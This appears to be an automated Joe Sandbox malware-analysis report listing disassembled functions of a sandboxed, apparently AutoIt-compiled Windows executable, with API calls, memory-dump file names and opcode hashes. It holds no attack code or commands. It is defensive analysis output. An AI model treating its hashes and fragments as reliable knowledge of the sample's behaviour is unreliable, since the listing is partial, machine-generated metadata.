                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                • String ID: bad allocation
                                                                                                                                • API String ID: 3902256705-2104205924
                                                                                                                                • Opcode ID: 1a5eec1d853a6955b0ecdd6f5f17456acd980488886ad0b1b2e8f11a471043bd
                                                                                                                                • Instruction ID: 965bd052bb97edf707bfebf0134ffadfb3578d0f6261fb35d5bbd8ecb6ef869c
                                                                                                                                • Opcode Fuzzy Hash: 1a5eec1d853a6955b0ecdd6f5f17456acd980488886ad0b1b2e8f11a471043bd
                                                                                                                                • Instruction Fuzzy Hash: 89F0FC7550820EA6DB25FBA8DD12ADEB7ECAF04374F200416F904D2183DFB4D694F6A5
                                                                                                                                Function 00F6F79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1888c0f855ba52117a18433720bd7723280b9e53296284cea01d73b0cb83966f
                                                                                                                                • Instruction ID: 72697fe288412e4db475acff868adc8108f851f03203b96801404edd8a1cacb5
                                                                                                                                • Opcode Fuzzy Hash: 1888c0f855ba52117a18433720bd7723280b9e53296284cea01d73b0cb83966f
                                                                                                                                • Instruction Fuzzy Hash: F4F19D71A083019FC710DF24D981B5AB7E1FF88314F14892EF9998B292DB34E949DF82
                                                                                                                                Function 00F88071 Relevance: 4.8, APIs: 3, Instructions: 266COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClearVariant_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 19560607-0
                                                                                                                                • Opcode ID: 8c277985139099fbf08e50e25be89674a521264e8b500a5ea06af00a0a085f6f
                                                                                                                                • Instruction ID: a66c1eca9ce02fbef74e412e821473fb0b28c10a65c44e19580601dad47cb99e
                                                                                                                                • Opcode Fuzzy Hash: 8c277985139099fbf08e50e25be89674a521264e8b500a5ea06af00a0a085f6f
                                                                                                                                • Instruction Fuzzy Hash: 17A1C5B1D002259FCB20DF58E841AADB7B1FF54320F648129E8459B351D739ED82EF90
                                                                                                                                Function 00F1C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00F1C00E,?,?,?,?,00000010), ref: 00F1C627
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00F1C65F
                                                                                                                                • _memmove.LIBCMT ref: 00F1C697
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3033907384-0
                                                                                                                                • Opcode ID: 1b3cd3e71d36945943294db88cae63485d29a30a83ca77b229ceebaf6ae0ff09
                                                                                                                                • Instruction ID: b5e6daf9f975043d788c3a938f1349518362cf6a21afd0b36c578d5d4e7650a2
                                                                                                                                • Opcode Fuzzy Hash: 1b3cd3e71d36945943294db88cae63485d29a30a83ca77b229ceebaf6ae0ff09
                                                                                                                                • Instruction Fuzzy Hash: 3D312AB26412016BD724AF34DC56B6BB7D9EF44320F14453AF85ECB290EA36E880D791
                                                                                                                                Function 00F13A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SHGetMalloc.SHELL32(00F13C31), ref: 00F13A7D
                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F13AD2
                                                                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00F13A8F
                                                                                                                                  • Part of subcall function 00F13B1E: _wcsncpy.LIBCMT ref: 00F13B32
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3981382179-0
                                                                                                                                • Opcode ID: fff015a8718bfab689b2fe833d9f34cd03cd34b44f08f6a732aa9b18a9d3580c
                                                                                                                                • Instruction ID: 4eeaae88014a4e2fa02f75f1d034ac9f22e505589a7b0ca14cfc697dfb0aafbc
                                                                                                                                • Opcode Fuzzy Hash: fff015a8718bfab689b2fe833d9f34cd03cd34b44f08f6a732aa9b18a9d3580c
                                                                                                                                • Instruction Fuzzy Hash: 65216276B00118ABCB14DF95DC84DEEB7BDEF88714B104095F509DB251EB34AE46DB90
                                                                                                                                Function 00F345EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 00F34603
                                                                                                                                  • Part of subcall function 00F38E52: __NMSG_WRITE.LIBCMT ref: 00F38E79
                                                                                                                                  • Part of subcall function 00F38E52: __NMSG_WRITE.LIBCMT ref: 00F38E83
                                                                                                                                • __NMSG_WRITE.LIBCMT ref: 00F3460A
                                                                                                                                  • Part of subcall function 00F38EB2: GetModuleFileNameW.KERNEL32(00000000,00FD0312,00000104,?,00000001,00F30127), ref: 00F38F44
                                                                                                                                  • Part of subcall function 00F38EB2: ___crtMessageBoxW.LIBCMT ref: 00F38FF2
                                                                                                                                  • Part of subcall function 00F31D65: ___crtCorExitProcess.LIBCMT ref: 00F31D6B
                                                                                                                                  • Part of subcall function 00F31D65: ExitProcess.KERNEL32 ref: 00F31D74
                                                                                                                                  • Part of subcall function 00F3889E: __getptd_noexit.LIBCMT ref: 00F3889E
                                                                                                                                • RtlAllocateHeap.NTDLL(016A0000,00000000,00000001), ref: 00F3462F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1372826849-0
                                                                                                                                • Opcode ID: 0dc4479418c00f279cc1a89ea9fe31c240a327f8a821bc3e8e091be9f7049cab
                                                                                                                                • Instruction ID: 6222b0eea15cb8665b55c30f670418028883519de059cf6b8d49fd07c1587503
                                                                                                                                • Opcode Fuzzy Hash: 0dc4479418c00f279cc1a89ea9fe31c240a327f8a821bc3e8e091be9f7049cab
                                                                                                                                • Instruction Fuzzy Hash: 9301B932A053019AE6253F74AC53B2A7748EF82771F51012AF505971C1DFB8BC41B665
                                                                                                                                Function 00F1E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • TranslateMessage.USER32(?), ref: 00F1E646
                                                                                                                                • DispatchMessageW.USER32(?), ref: 00F1E651
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E664
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4217535847-0
                                                                                                                                • Opcode ID: 59ed7bee9ac024051714956ea775f7a5227b0e7ddd66320eb02dd37d7b0ba31a
                                                                                                                                • Instruction ID: eea3f3d151fa926eb9028bb6aeb6e75572e2549daf08784d9640b311f8ee0292
                                                                                                                                • Opcode Fuzzy Hash: 59ed7bee9ac024051714956ea775f7a5227b0e7ddd66320eb02dd37d7b0ba31a
                                                                                                                                • Instruction Fuzzy Hash: A6F0FE72A14345A7EB10D7E18C45BABB3DDBF94780F58082ABA41C2190D6B4D444AB22
                                                                                                                                Function 00F5C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _free.LIBCMT ref: 00F5C45E
                                                                                                                                  • Part of subcall function 00F328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00F38715,00000000,00F388A3,00F34673,?), ref: 00F328DE
                                                                                                                                  • Part of subcall function 00F328CA: GetLastError.KERNEL32(00000000,?,00F38715,00000000,00F388A3,00F34673,?), ref: 00F328F0
                                                                                                                                • _free.LIBCMT ref: 00F5C46F
                                                                                                                                • _free.LIBCMT ref: 00F5C481
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 776569668-0
                                                                                                                                • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                                                                                                                                • Instruction ID: 92394d31920db40d057f695ba89097ba1a2e0d1b98b3a29b55b49d7e2f36d8ae
                                                                                                                                • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                                                                                                                                • Instruction Fuzzy Hash: C4E012B1A007119ACA64E97D6C54FF3B3DC6F04772F14482EF94AD7142DF18E844A1B4
                                                                                                                                Function 00F2058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CALL
                                                                                                                                • API String ID: 0-4196123274
                                                                                                                                • Opcode ID: cc9a305d727849977f1a2475c0a35cb3f7351eed9a3165f264825bb79b413802
                                                                                                                                • Instruction ID: 02e196be025c836cbb2928d01c1d59c3da7526262f9652ff93180bae5dce692a
                                                                                                                                • Opcode Fuzzy Hash: cc9a305d727849977f1a2475c0a35cb3f7351eed9a3165f264825bb79b413802
                                                                                                                                • Instruction Fuzzy Hash: B4227D71908211DFD724DF24D490B6ABBE1FF84314F14896DE89A8B362DB35E885EF42
                                                                                                                                Function 00F1131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F116F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00F11751
                                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F1159B
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00F11612
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F858F7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 458326420-0
                                                                                                                                • Opcode ID: 7883f6b1f720d9d7419f665c4844169471df8269da501bd554f5ab7ede8f7a66
                                                                                                                                • Instruction ID: 6c989b36a6d010d4a92acb6792b89a5e3e5f0447814bc2fba78ba6b7fb008a30
                                                                                                                                • Opcode Fuzzy Hash: 7883f6b1f720d9d7419f665c4844169471df8269da501bd554f5ab7ede8f7a66
                                                                                                                                • Instruction Fuzzy Hash: F071BBB4A06249ABC314DFBABE91598BBA7FB4B344798422FD00A87372CB744454FF11
                                                                                                                                Function 00F14010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID: EA06
                                                                                                                                • API String ID: 4104443479-3962188686
                                                                                                                                • Opcode ID: 7c230a1927f636fb9378d8882cc28539984fd428ffaa1f2c33428b62da6b121e
                                                                                                                                • Instruction ID: 8969314b5fa81004d267e52d3c5895127a136ec67eab17c527e50bdd55d96588
                                                                                                                                • Opcode Fuzzy Hash: 7c230a1927f636fb9378d8882cc28539984fd428ffaa1f2c33428b62da6b121e
                                                                                                                                • Instruction Fuzzy Hash: 52419F72E04158A7CB12DB548C527FE7F629FD9310F284465EA82EB283C625BDC4B7A1
                                                                                                                                Function 00F6013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscmp
                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                • API String ID: 856254489-3771769585
                                                                                                                                • Opcode ID: d49e6ce29ece21da3c091e61514f93d510b26e635337cc79fcabb42da66193a5
                                                                                                                                • Instruction ID: 3f93c3833f6c43b676faacc3641cf47ceae8481850d8651b6c522ed9d114a3ee
                                                                                                                                • Opcode Fuzzy Hash: d49e6ce29ece21da3c091e61514f93d510b26e635337cc79fcabb42da66193a5
                                                                                                                                • Instruction Fuzzy Hash: 8911A775600204DFCB04EB54DD91E9AB3A5AF85720B248059F606AF391DE74ED82E7A0
                                                                                                                                Function 00F13BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F83CF1
                                                                                                                                  • Part of subcall function 00F131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00F131DA
                                                                                                                                  • Part of subcall function 00F13A67: SHGetMalloc.SHELL32(00F13C31), ref: 00F13A7D
                                                                                                                                  • Part of subcall function 00F13A67: SHGetDesktopFolder.SHELL32(?), ref: 00F13A8F
                                                                                                                                  • Part of subcall function 00F13A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00F13AD2
                                                                                                                                  • Part of subcall function 00F13B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00FD22E8,?), ref: 00F13B65
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                • String ID: X
                                                                                                                                • API String ID: 2727075218-3081909835
                                                                                                                                • Opcode ID: 8dc7a7be6436ae8c22601aab1508e8f70c56d2638db281c61e57123e1d204871
                                                                                                                                • Instruction ID: e4ca8a37a4aaab33de79387f89d7f3bb2fcbf2093229f834064f11f2f7453d83
                                                                                                                                • Opcode Fuzzy Hash: 8dc7a7be6436ae8c22601aab1508e8f70c56d2638db281c61e57123e1d204871
                                                                                                                                • Instruction Fuzzy Hash: CB118AB1E10298ABCF05DFD4DC05ADE7BF9AF55714F04800EE401BB241DBB94689ABA1
                                                                                                                                Function 00F134C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00F834AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
